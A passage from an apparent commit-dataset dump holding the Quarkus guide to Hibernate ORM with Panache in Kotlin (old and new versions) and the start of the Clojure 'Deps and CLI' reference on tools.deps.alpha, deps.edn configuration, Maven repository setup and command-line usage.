ecosystem. Panache offers a\nnew layer atop this familiar framework. This guide will not dive into the specifics of either as those are already\ncovered in the link:hibernate-orm-panache.adoc[Panache guide]. In this guide, we'll cover the Kotlin-specific changes\nneeded to use Panache in your Kotlin-based Quarkus applications.\n\n== First: an example\n\nAs we saw in the Panache guide, Panache allows us to extend the functionality in our entities and repositories (also known as DAOs) with some automatically\nprovided functionality. 
When using Kotlin, the approach is very similar to what we see in the Java version with a slight\nchange or two. To Panache-enable your entity, you would define it something like this:\n\n[source,kotlin]\n----\n@Entity\nclass Person : PanacheEntity() {\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\nAs you can see, our entities remain simple. There is, however, a slight difference from the Java version. The Kotlin\nlanguage doesn't support the notion of static methods in quite the same way as Java does. Instead, we must use a\nhttps:\/\/kotlinlang.org\/docs\/tutorials\/kotlin-for-py\/objects-and-companion-objects.html#companion-objects[companion object]:\n\n[source,kotlin]\n----\n@Entity\nclass Person : PanacheEntity() {\n companion object : PanacheCompanion<Person> { \/\/ <1>\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n }\n\n lateinit var name: String \/\/ <2>\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n<1> The companion object holds all the methods not related to a specific instance, allowing for general management and\nquerying bound to a specific type.\n<2> Here there are options, but we've chosen the `lateinit` approach. This allows us to declare these fields as non-null\nknowing they will be properly assigned either by the constructor (not shown) or by Hibernate loading data from the\ndatabase.\n\nNOTE: These types differ from the Java types mentioned in those tutorials. For Kotlin support, all the Panache\ntypes will be found in the `io.quarkus.hibernate.orm.panache.kotlin` package. This subpackage allows for the distinction\nbetween the Java and Kotlin variants and allows for both to be used unambiguously in a single project.\n\nIn the Kotlin version, we've simply moved the bulk of the link:https:\/\/www.martinfowler.com\/eaaCatalog\/activeRecord.html[`active record pattern`]\nfunctionality to the `companion object`. Apart from this slight change, we can then work with our types in ways that map easily\nfrom the Java side of the world.\n\n\n== Using the repository pattern\n\n\n=== Defining your entity\n\nWhen using the repository pattern, you can define your entities as regular JPA entities.\n\n[source,kotlin]\n----\n@Entity\nclass Person {\n @Id\n @GeneratedValue\n var id: Long? 
= null\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\n=== Defining your repository\n\nWhen using Repositories, you get the exact same convenient methods as with the active record pattern, injected in your Repository,\nby making them implement `PanacheRepository`:\n\n[source,kotlin]\n----\nclass PersonRepository : PanacheRepository<Person> {\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n}\n----\n\nAll the operations that are defined on `PanacheEntityBase` are available on your repository, so using it\nis exactly the same as using the active record pattern, except you need to inject it:\n\n[source,kotlin]\n----\n@Inject\nlateinit var personRepository: PersonRepository\n\n@GET\nfun count() = personRepository.count()\n----\n\n=== Most useful operations\n\nOnce you have written your repository, here are the most common operations you will be able to perform:\n\n[source,kotlin]\n----\n\/\/ creating a person\nvar person = Person()\nperson.name = \"Stef\"\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1)\nperson.status = Status.Alive\n\n\/\/ persist it\npersonRepository.persist(person)\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif (personRepository.isPersistent(person)) {\n \/\/ delete it\n personRepository.delete(person)\n}\n\n\/\/ getting a list of all Person entities\nval allPersons = personRepository.listAll()\n\n\/\/ finding a specific person by ID\nperson = personRepository.findById(personId) ?: throw Exception(\"No person with that ID\")\n\n\/\/ finding all living persons\nval livingPersons = personRepository.list(\"status\", Status.Alive)\n\n\/\/ counting all persons\nval countAll = personRepository.count()\n\n\/\/ counting all living persons\nval countAlive = personRepository.count(\"status\", Status.Alive)\n\n\/\/ delete all living persons\npersonRepository.delete(\"status\", Status.Alive)\n\n\/\/ delete all persons\npersonRepository.deleteAll()\n\n\/\/ delete by id\nval deleted = personRepository.deleteById(personId)\n\n\/\/ set the name of all living persons to 'Mortal'\npersonRepository.update(\"name = 'Mortal' where status = ?1\", Status.Alive)\n\n----\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,kotlin]\n----\nval persons = personRepository.streamAll()\nval namesButEmmanuels = persons\n .map { it.name.toLowerCase() }\n .filter { it != \"emmanuel\" }\n----\n\nNOTE: The `stream` methods require a transaction to work.\n\nNOTE: The rest of the documentation shows usages based on the active record pattern only,\nbut keep in mind that they can be performed with the repository pattern as well.\nThe repository pattern examples have been omitted for brevity.\n\nFor more examples, please consult the link:hibernate-orm-panache[Java version] for complete details. Both APIs\nare the same and work identically except for some Kotlin-specific tweaks to make things feel more natural to\nKotlin developers. These tweaks include things like better use of nullability and the lack of `Optional` on API\nmethods.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started using Panache with Kotlin, you can, generally, follow the steps laid out in the Java tutorial. 
The biggest\nchange to configuring your project is the Quarkus artifact to include. You can, of course, keep the Java version if you\nneed but if all you need are the Kotlin APIs then include the following dependency instead:\n\n[source,xml]\n----\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache-kotlin<\/artifactId> \/\/ <1>\n <\/dependency>\n<\/dependencies>\n----\n<1> Note the addition of `-kotlin` on the end. Generally you'll only need this version but if your project will be using\nboth Java and Kotlin code, you can safely include both artifacts.\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache and Kotlin\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto standard JPA implementation and is well-known in the Java ecosystem. Panache offers a\nnew layer atop this familiar framework. This guide will not dive in to the specifics of either as those are already\ncovered in the link:hibernate-orm-panache.adoc[Panache guide]. In this guide, we'll cover the Kotlin specific changes\nneeded to use Panache in your Kotlin-based Quarkus applications.\n\n== First: an example\n\nAs we saw in the Panache guide, Panache allows us to extend the functionality in our entities and repositories (also known as DAOs) with some automatically\nprovided functionality. When using Kotlin, the approach is very similar to what we see in the Java version with a slight\nchange or two. To Panache-enable your entity, you would define it something like:\n\n[source,kotlin]\n----\n@Entity\nclass Person: PanacheEntity {\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\nAs you can see our entities remain simple. There is, however, a slight difference from the Java version. The Kotlin\nlanguage doesn't support the notion of static methods in quite the same way as Java does. Instead, we must use a\n[companion object](https:\/\/kotlinlang.org\/docs\/tutorials\/kotlin-for-py\/objects-and-companion-objects.html#companion-objects):\n\n[source,kotlin]\n----\n@Entity\nclass Person : PanacheEntity {\n companion object: PanacheCompanion<Person> { \/\/ <1>\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n }\n\n lateinit var name: String \/\/ <2>\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n<1> The companion object holds all the methods not related to a specific instance allowing for general management and\nquerying bound to a specific type.\n<2> Here there are options, but we've chosen the `lateinit` approach. This allows us to declare these fields as non-null\nknowing they will be properly assigned either by the constructor (not shown) or by hibernate loading data from the\ndatabase.\n\nNOTE: These types differ from the Java types mentioned in those tutorials. For kotlin support, all the Panache\ntypes will be found in the `io.quarkus.hibernate.orm.panache.kotlin` package. 
This subpackage allows for the distinction\nbetween the Java and Kotlin variants and allows for both to be used unambiguously in a single project.\n\nIn the Kotlin version, we've simply moved the bulk of the link:https:\/\/www.martinfowler.com\/eaaCatalog\/activeRecord.html[`active record pattern`]\nfunctionality to the `companion object`. Apart from this slight change, we can then work with our types in ways that map easily\nfrom the Java side of world.\n\n\n== Using the repository pattern\n\n\n=== Defining your entity\n\nWhen using the repository pattern, you can define your entities as regular JPA entities.\n[source,kotlin]\n----\n@Entity\nclass Person {\n @Id\n @GeneratedValue\n var id: Long? = null;\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\n=== Defining your repository\n\nWhen using Repositories, you get the exact same convenient methods as with the active record pattern, injected in your Repository,\nby making them implement `PanacheRepository`:\n\n[source,kotlin]\n----\nclass PersonRepository: PanacheRepository<Person> {\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n}\n----\n\nAll the operations that are defined on `PanacheEntityBase` are available on your repository, so using it\nis exactly the same as using the active record pattern, except you need to inject it:\n\n[source,kotlin]\n----\n@Inject\nlateinit var personRepository: PersonRepository\n\n@GET\nfun count() = personRepository.count()\n----\n\n=== Most useful operations\n\nOnce you have written your repository, here are the most common operations you will be able to perform:\n\n[source,kotlin]\n----\n\/\/ creating a person\nvar person = Person()\nperson.name = \"Stef\"\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1)\nperson.status = Status.Alive\n\n\/\/ persist it\npersonRepository.persist(person)\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(personRepository.isPersistent(person)){\n \/\/ delete it\n personRepository.delete(person)\n}\n\n\/\/ getting a list of all Person entities\nval allPersons = personRepository.listAll()\n\n\/\/ finding a specific person by ID\nperson = personRepository.findById(personId) ?: throw Exception(\"No person with that ID\")\n\n\/\/ finding all living persons\nval livingPersons = personRepository.list(\"status\", Status.Alive)\n\n\/\/ counting all persons\nval countAll = personRepository.count()\n\n\/\/ counting all living persons\nval countAlive = personRepository.count(\"status\", Status.Alive)\n\n\/\/ delete all living persons\npersonRepository.delete(\"status\", Status.Alive)\n\n\/\/ delete all persons\npersonRepository.deleteAll()\n\n\/\/ delete by id\nval deleted = personRepository.deleteById(personId)\n\n\/\/ set the name of all living persons to 'Mortal'\npersonRepository.update(\"name = 'Mortal' where status = ?1\", Status.Alive)\n\n----\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,kotlin]\n----\nval persons = personRepository.streamAll();\nval namesButEmmanuels = persons\n .map { it.name.toLowerCase() }\n .filter { it != \"emmanuel\" }\n----\n\nNOTE: The `stream` methods require a transaction to work.\n\nNOTE: The rest of the documentation show usages based on the active record pattern only,\nbut keep in mind that they can be 
performed with the repository pattern as well.\nThe repository pattern examples have been omitted for brevity.\n\nFor more examples, please consult the link:hibernate-orm-panache.adoc[java version] for complete details. Both APIs\nare the same and work identically except for some kotlin-specific tweaks to make things feel more natural to\nKotlin developers. These tweaks include things like better use of nullability and the lack of `Optional` on API\nmethods.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started using Panache with Kotlin, you can, generally, follow the steps laid out in the Java tutorial. The biggest\nchange to configuring your project is the Quarkus artifact to include. You can, of course, keep the Java version if you\nneed but if all you need are the Kotlin APIs then include the following dependency instead:\n\n[source,xml]\n----\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache-kotlin<\/artifactId> \/\/ <1>\n <\/dependency>\n<\/dependencies>\n----\n<1> Note the addition of `-kotlin` on the end. Generally you'll only need this version but if your project will be using\nboth java and kotlin code, you can safely include both artifacts.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59cc2a6647cd55da3b8d0c5fe762bd81f3798323","subject":"fix header","message":"fix header\n","repos":"clojure\/clojure-site","old_file":"content\/reference\/deps_and_cli.adoc","new_file":"content\/reference\/deps_and_cli.adoc","new_contents":"= Deps and CLI\nAlex Miller\n2017-11-30\n:type: reference\n:toc: macro\n:icons: font\n:prevpagehref: lisps\n:prevpagetitle: Differences with Lisps\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\n== Rationale\n\nClojure \"endeavors to be a general-purpose language suitable in those areas where Java is suitable\" (from <<xref\/..\/..\/about\/rationale#,Rationale>>). To effectively target the JVM platform, Clojure needs to provide ready access to Java libraries, ideally in a way suited for dynamic development. In practice, this means meeting the JVM platform in two places:\n\n* the classpath used when invoking JVM processes (and\/or URLClassLoaders)\n* transitive dependency download and resolution from providers like Maven\n\nClojure build tools have traditionally taken the approach of wrapping the Maven ecosystem to gain access to Java libraries. However, they have also forced this approach on Clojure code as well, requiring a focus on artifacts that must be built and deployed (which Clojure does not require). This approach has created friction for Clojure developers, making it hard to e.g. 
work with libs not yet publishing artifacts, work on speculative changes w\/o artifacts or across multiple libs, or give control to a 3rd party to manage shared dependencies.\n\nClojure provides:\n\n* https:\/\/github.com\/clojure\/tools.deps.alpha[tools.deps.alpha] - a library providing a functional API for resolving dependency graphs and building classpaths that can utilize both Maven and other providers of code or artifacts\n* Command line tools (`clojure` and `clj`) that enable users to make use of this capability at the terminal to declare dependencies, assemble classpaths, and launch Clojure programs\n* System-specific installers for downloading the tools, improving the \"Getting Started\" experience\n\n== Building classpaths with tools.deps.alpha\n\nThe JVM classpath consists of a series of roots, either directory paths or the path to a jar file. Classes (and Clojure files) map via package or namespace to a path relative to a classpath root. For example, the `java.lang.String` class can be found at path `java\/lang\/String.class` and the `clojure.set` Clojure namespace may be found at paths `clojure\/set.class` (for AOT), `clojure\/set.clj`, or `clojure\/set.cljc`. When the JVM needs to load one of these files it searches each root for the relative path and loads it when found.\n\nWe divide the process of building a classpath into two primary operations: `resolve-deps` and `make-classpath`. Below is a high-level view of this process:\n\n\nimage::\/images\/content\/guides\/deps\/deps.png[\"Dep Tools\", link=\"\/images\/content\/guides\/deps\/deps.png\"]\n\n=== resolve-deps\n\n**`(resolve-deps deps args-map)`**\n\n`resolve-deps` takes an initial map of required dependencies and a map of args that modify the resolution process. It builds a full graph of transitive dependencies, resolves any version differences, and flattens that graph to a full list of dependencies required in the classpath.\n\nThe deps are a map of library to coordinate. The library is (in Maven terms) the groupId and artifactId, which are sufficient to locate the desired project. The coordinate is used to describe a particular version that is being requested from a particular provider (like Maven).\n\nFor example, this deps map specifies a (Maven-based) dependency:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\"}}\n----\n\n`resolve-deps` expands these dependencies to include all transitive dependencies, cut cycles, resolve version differences, download required artifacts from the provider, and produce a *lib map* of the flattened set of all needed dependencies and where to find their artifacts:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\",\n :deps\/manifest :mvn,\n :paths [\"...\/core.cache-0.6.5.jar\"]}\n org.clojure\/data.priority-map {:mvn\/version \"0.0.7\",\n :deps\/manifest :mvn,\n :dependents [org.clojure\/core.cache],\n :paths [\"...\/data.priority-map-0.0.7.jar\"]} \n ... }\n----\n\nThe lib map lists all libraries, their selected coordinates, the `:paths` on disk, and a list of dependents that caused it to be included. Here you can see that `data.priority-map` was included as a dependency of core.cache.\n\nThe second `args-map` is a map of optional modifications to the standard expansion to account for common use cases: adding extra dependencies, overriding deps, and default deps. These can be used separately or together, or not at all:\n\n[source,clojure]\n----\n{:extra-deps { ... }\n :override-deps { ... }\n :default-deps { ... 
}}\n----\n\n`:extra-deps` is the most common modification - it allows you to optionally add extra dependencies to the base dependency set. The value is a map of library to coordinate:\n\n[source,clojure]\n----\n{:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n----\n\n`:override-deps` overrides the coordinate version chosen by the version resolution to force a particular version instead. This also takes a map of library to coordinate:\n\n[source,clojure]\n----\n{:override-deps {org.clojure\/clojure {:mvn\/version \"1.9.0\"}}}\n----\n\n`:default-deps` provides a set of default coordinate versions to use if no coordinate is specified. The default deps can be used across a set of shared projects to act as a dependency management system:\n\n[source,clojure]\n----\n{:default-deps {org.clojure\/core.cache {:mvn\/version \"0.6.4\"}}}\n----\n\n=== make-classpath\n\n**`(make-classpath lib-map paths args-map)`**\n\nThe `make-classpath` step takes the lib map (the result of `resolve-deps`), the internal source paths of the project `[\"src\"]`, an args-map of optional modifications, and produces a classpath string for use in the JVM.\n\nThe args-map includes support for modifications to be applied while making the classpath: adding extra paths, and overriding the location of libraries specified in the lib map. These modifications can be used separately or together or not at all in a map like this:\n\n[source,clojure]\n----\n{:extra-paths [ ... ]\n :classpath-overrides { ... }}\n----\n\n`:extra-paths` is used to include source paths in addition to your standard source paths, for example to include directories of test source:\n\n[source,clojure]\n----\n{:extra-paths [\"test\" \"resources\"]}\n----\n\n`:classpath-overrides` specify a location to pull a dependency that overrides the path found during dependency resolution, for example to replace a dependency with a local debug version. Many of these use cases are ones where you would be tempted to prepend the classpath to \"override\" something else.\n\n[source,clojure]\n----\n{:classpath-overrides \n {org.clojure\/clojure \"\/my\/clojure\/target\"}}\n----\n\n== Command line tools\n\n=== Directories\n\nThe tools rely on several directories and optionally on several environment variables.\n\n* Installation directory\n** Created during installation\n** Contents:\n*** `bin\/clojure` - main tool\n*** `bin\/clj` - wrapper for interactive repl use (uses `rlwrap`)\n*** `deps.edn` - install level deps.edn file, with some default deps (Clojure, etc) and provider config\n*** `example-deps.edn` - commented example that gets copied to `<config_dir>\/deps.edn`\n*** `libexec\/clojure-tools-X.Y.Z.jar` - uberjar invoked by `clojure` to construct classpaths\n* Config directory\n** Holds a deps.edn file that persists across tool upgrades and affects all projects\n** Locations used in this order:\n*** If `$CLJ_CONFIG` is set, then use `$CLJ_CONFIG` (explicit override)\n*** If `$XDG_CONFIG_HOME` is set, then use `$XDG_CONFIG_HOME\/clojure` (Freedesktop conventions)\n*** Else use `$HOME\/.clojure` (most common)\n** Contents:\n*** `deps.edn` - user deps file, defines default Clojure version and provider defaults\n* Cache directory\n** Lazily created when `clojure` is invoked without a local `deps.edn` file. 
Locations used in this order:\n*** If `$CLJ_CACHE` is set, then use `$CLJ_CACHE` (explicit override)\n*** If `$XDG_CACHE_HOME` is set, then use `$XDG_CACHE_HOME\/clojure` (Freedesktop conventions)\n*** Else use `config_dir\/.cpcache` (most common)\n* Project directory\n** The current directory\n** Contents:\n*** `deps.edn` - optional project deps\n*** `.cpcache` - project cache directory, same as the user-level cache directory, created if there is a `deps.edn`\n\n=== deps.edn\n\nThe configuration file format (in \"deps.edn\" files) is an edn map with top-level keys for `:deps`, `:paths`, and `:aliases`, plus provider-specific keys for configuring dependency sources.\n\nAfter installation, deps.edn configuration files can be found in (up to) three locations:\n\n- installation directory - created only at install time\n- config directory (often ~\/.clojure) - modified to change cross-project (or no-project) defaults\n- the local directory - per-project settings\n\nThe `deps.edn` files in each of these locations (if they exist) are merged to form one combined dependency configuration. The merge is done in the order above - install\/config\/local - last one wins. The operation is essentially `merge-with merge`, except for the `:paths` key, where only the last one found is used (they are not combined).\n\nYou can use the `-Sverbose` option to see all of the actual directory locations.\n\n=== Dependencies\n\nDependencies are declared in deps.edn with a top level key `:deps` - a map from library to coordinate. Libraries are symbols of the form <groupId>\/<artifactId> or simply <id> if the group and artifact ID are the same. To indicate a classifier, use <groupId>\/<artifactId>$<classifier>. \n\nCoordinates can take several forms depending on the coordinate type:\n\n* Maven coordinate: `{:mvn\/version \"1.2.3\"}`\n** Other optional keys: `:extension`, `:exclusions`\n** Note: `:classifier` is no longer supported - add to lib name as specified above\n* Local project coordinate: `{:local\/root \"\/path\/to\/project\"}`\n** Optional key `:deps\/manifest`\n*** Specifies the project manifest type\n*** Default is to auto-detect the project type (currently either `:deps` or `:pom`)\n* Local jar: `{:local\/root \"\/path\/to\/file.jar\"}`\n** If the jar has been packaged with a pom.xml file, the pom will be read and used to find transitive deps\n* Git coordinate: `{:git\/url \"https:\/\/github.com\/user\/project.git\", :sha \"sha\", :tag \"tag\"}`\n** Required key `:git\/url` can be one of the following:\n*** https - secure anonymous access to public repos\n*** ssh or user@host form urls (including GitHub) - ssh-based access (see Git configuration section)\n** Required key `:sha` should indicate the full commit sha\n** Optional key `:tag` is used only to indicate the semantics of the sha\n** Optional key `:deps\/root`\n*** Specifies the relative path within the root to search for the manifest file\n** Optional key `:deps\/manifest` - same as in `:local` deps\n\n[source,clojure]\n----\n{:deps\n {org.clojure\/tools.reader {:mvn\/version \"1.1.1\"}\n github-sally\/awesome {:git\/url \"https:\/\/github.com\/sally\/awesome.git\", :sha \"123abcd549214b5cba04002b6875bdf59f9d88b6\"}\n ;; ... add more here\n }}\n----\n\n=== Paths\n\nPaths are declared in a top level key `:paths`, which is a vector of string paths (typically relative to the project root). 
These source paths will be included on the classpath.\n\nWhile dependency sets are merged across all of the configuration files, only the last paths found in one of the config files is used, prior ones are ignored.\n\n[source,clojure]\n----\n{:paths [\"src\"]}\n----\n\n=== Aliases\n\nAliases give a name to a data structure that can be used either by the Clojure tool itself or other consumers of deps.edn. They are defined in the `:aliases` section of the config file. These Clojure tool flags use the following well-known alias keys:\n\n* -R - uses these keys when expanding deps during `resolve-deps`:\n** `:extra-deps` - a deps map from lib to coordinate of deps to add to the deps\n** `:override-deps` - a deps map from lib to coordinate of override versions to use\n** `:default-deps` - a deps map from lib to coordinate of versions to use if none is found\n** If multiple alias maps with these keys are activated, all of them are merge-with merged\n* -C - uses these keys when creating the classpath during `make-classpath`:\n** `:extra-paths` - a collection of string paths to add to `:paths`\n** `:classpath-overrides` - a map of lib to string path to replace the location of the lib\n** If multiple maps with these keys are activated, `:extra-paths` concatenate and `:classpath-overrides` merge-with merge\n* -O - uses these keys when constructing the final command JVM options:\n** `:jvm-opts` - a collection of string JVM options\n** If multiple maps with these keys are activated, `:jvm-opts` concatenate\n** If -J JVM options are also specified on the command line, they are concatenated after the alias options\n* -M - uses these keys when constructing the final command clojure.main arguments:\n** `:main-opts` - a collection of clojure.main options\n** If multiple maps with these keys are activated, only the last one will be used\n** If command line clojure.main arguments are supplied on the command line, they are concatenated after the last main alias map\n* -A - activates all of the keys above, also these keys are only supported with -A:\n** `:deps` - a deps map from lib to coordinate of deps to REPLACE the project `:deps`\n** `:paths` a collection of string paths to REPLACE project `:paths`\n\nSo given a deps.edn like:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :deps {}\n :aliases\n {:1.7 {:override-deps {org.clojure\/clojure {:mvn\/version \"1.7.0\"}}}\n :bench {:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n :test {:extra-paths [\"test\"]}}}\n----\n\nYou can activate all three aliases to create a classpath that switches to an older Clojure version, adds the benchmarking library, and includes the test directory in the classpath to see how it changes the classpath:\n\n[source]\n----\nclj -R:1.7:bench -C:test -Spath\n----\n\nYou can use -A to include all types of aliases or define aliases that cross multiple alias types:\n\n[source]\n----\nclj -A:1.7:bench:test -Spath\n----\n\n=== Procurers\n\nCoordinates are interpreted by procurers, which know how to determine dependencies for a library and download artifacts. tools.deps.alpha is designed to support an extensible set of procurers that can expand over time. Currently the available procurers are: `mvn`, `local`, and `git`.\n\nThe procurer to use is determined by examining the attributes of the coordinate and using the first attribute qualifier that's found (ignoring the reserved qualifier \"deps\"). 
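\n\nAs a minimal sketch (an illustration only, not the actual tools.deps.alpha dispatch code), this qualifier-based detection could be expressed as:\n\n[source,clojure]\n----\n;; illustrative only: pick the first non-\"deps\" key qualifier in a coordinate\n(defn coord-type [coord]\n (->> (keys coord)\n (keep namespace)\n (remove #{\"deps\"})\n first\n keyword))\n\n(coord-type {:mvn\/version \"0.6.5\"}) ;; => :mvn\n(coord-type {:local\/root \"\/tmp\/lib\" :deps\/manifest :deps}) ;; => :local\n----\n\n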
For example, a Maven coordinate contains a `:mvn\/version` attribute and a local coordinate contains a `:local\/root` attribute.\n\nProcurers may also have configuration attributes stored at the root of the configuration map under the same qualifier. The `mvn` procurer will look for `:mvn\/repos`. The installation deps.edn configures the default Maven repos:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"central\" {:url \"https:\/\/repo1.maven.org\/maven2\/\"}\n \"clojars\" {:url \"https:\/\/clojars.org\/repo\"}}}\n----\n\n==== Maven authenticated repos\n\nFor Maven deps in authenticated repositories, existing Maven infrastructure is used to convey credentials.\n\nIn your `~\/.m2\/settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-auth-repo<\/id>\n <username>zango<\/username>\n <password>123<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThen in your `deps.edn` include a repo with a name matching the server id (here `my-auth-repo`):\n\n[source,clojure]\n----\n{:deps\n {authenticated\/dep {:mvn\/version \"1.2.3\"}}\n :mvn\/repos\n {\"my-auth-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThen just refer to your dependencies as usual in the `:deps`.\n\n==== Maven S3 repos\n\nThe tools also provide support for connecting to public and private S3 Maven repositories.\n\nAdd a `:mvn\/repos` that includes the s3 repository root:\n\n[source,clojure]\n----\n{:deps\n {my.library {:mvn\/version \"0.1.2\"}}\n :mvn\/repos\n {\"my-private-repo\" {:url \"s3:\/\/my-bucket\/maven\/releases\"}}}\n----\n\nS3 buckets are specific to the AWS region they were created in. The s3 transporter will attempt to determine the bucket's location. If that doesn't work, you can specify the bucket region in the URL explicitly: `\"s3:\/\/my-bucket\/maven\/releases?region=us-west-2\"`.\n\nFor authenticated repos, AWS credentials can be set in the `~\/.m2\/settings.xml` on a per-server basis or will be loaded ambiently from the AWS credential chain (env vars, etc). The repository name in `deps.edn` must match the server id in `settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-private-repo<\/id>\n <username>AWS_ACCESS_KEY_HERE<\/username>\n <password>AWS_SECRET_ACCESS_KEY_HERE<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nAWS S3 credentials can be set in the environment using one of these mechanisms:\n\n1. Set the environment variables `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`.\n2. Create a default profile in the AWS credentials file `~\/.aws\/credentials` (older `~\/.aws\/config` also supported).\n3. Create a named profile in the AWS credentials file and set the environment variable `AWS_PROFILE` with its name.\n4. Amazon ECS container and instance profile credentials should also work, but have not been tested.\n\nFor more information, most of the advice in https:\/\/docs.aws.amazon.com\/sdk-for-java\/v1\/developer-guide\/credentials.html[this AWS document] describes how credentials are located. 
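\n\nFor instance, to exercise mechanisms 1 and 3 above when resolving deps from an S3 repo (the key and profile values below are placeholders, not real credentials):\n\n[source,shell]\n----\n# mechanism 1: credentials from environment variables\n$ export AWS_ACCESS_KEY_ID=AKIA...\n$ export AWS_SECRET_ACCESS_KEY=...\n$ clj -Spath\n\n# mechanism 3: a named profile from ~\/.aws\/credentials\n$ export AWS_PROFILE=my-profile\n$ clj -Sforce -Spath\n----\n\n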
Note however that the Java system properties options will NOT work with the command line tools (but would work if using the tools.deps.alpha library directly).\n\n==== Maven proxies\n\nIn environments where the internet is accessed via a proxy, existing Maven configuration in `~\/.m2\/settings.xml` is used to set up the proxy connection:\n\n[source,xml]\n----\n<settings>\n ...\n <proxies>\n <proxy>\n <id>my-proxy<\/id>\n <host>proxy.my.org<\/host>\n <port>3128<\/port>\n <nonProxyHosts>localhost|*.my.org<\/nonProxyHosts>\n <\/proxy>\n <\/proxies>\n ...\n<\/settings>\n----\n\nRefer to the Maven https:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Guide to using proxies] for further details.\n\n==== Maven HTTP headers\n\nFor adding custom headers to outgoing HTTP requests, existing Maven configuration in `~\/.m2\/settings.xml` is used.\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-token-repo<\/id>\n <configuration>\n <httpHeaders>\n <property>\n <name>Private-Token<\/name>\n <value>abc123<\/value>\n <\/property>\n <\/httpHeaders>\n <\/configuration>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThe server id in `settings.xml` must match the repository name in `deps.edn`:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"my-token-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThis mechanism is used by repositories that authenticate using a token, rather than by username and password.\n\n==== Git configuration\n\nThe supported git url protocols are https and ssh. https repos will be accessed anonymously and require no additional authentication information. This approach is recommended for public repos.\n\nssh repos may be either public or private. Access to a git repo via ssh requires an ssh keypair. The private key of this keypair may or may not have a passphrase. ssh authentication works by connecting to the local ssh agent (ssh-agent on *nix or Pageant via PuTTY on Windows).\nThe ssh-agent must have a registered identity for the key being used to access the Git repository.\nTo check whether you have registered identities, use:\n\n[source,shell]\n----\n$ ssh-add -l\n2048 SHA256:S2SMY1YRTRFg3sqsMy1eTve4ag78XEzhbzzdVxZroDk \/Users\/me\/.ssh\/id_rsa (RSA)\n----\n\nwhich should return one or more registered identities, typically the one at `~\/.ssh\/id_rsa`.\n\nFor more information on creating keys and using the ssh-agent to manage your ssh identities, GitHub provides excellent info:\n\n* https:\/\/help.github.com\/articles\/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent\/\n* https:\/\/help.github.com\/articles\/working-with-ssh-key-passphrases\/\n\n_Note: user\/password authentication is not supported for any protocol._\n\n=== Usage\n\nUsage:\n\n* `clojure [dep-opt*] [init-opt*] [main-opt] [arg*]`\n* `clj [dep-opt*] [init-opt*] [main-opt] [arg*]`\n\nThe clojure tool is a runner for Clojure. clj is a wrapper for interactive repl use. These tools ultimately construct and invoke a command-line of the form:\n\n`java [java-opt*] -cp classpath clojure.main [init-opt*] [main-opt] [arg*]`\n\nThe dep-opts are used to build the java-opts and classpath:\n\n----\n-Jopt Pass opt through in java_opts, ex: -J-Xmx512m\n-Ralias... Concatenated resolve-deps aliases, ex: -R:bench:1.9\n-Calias... Concatenated 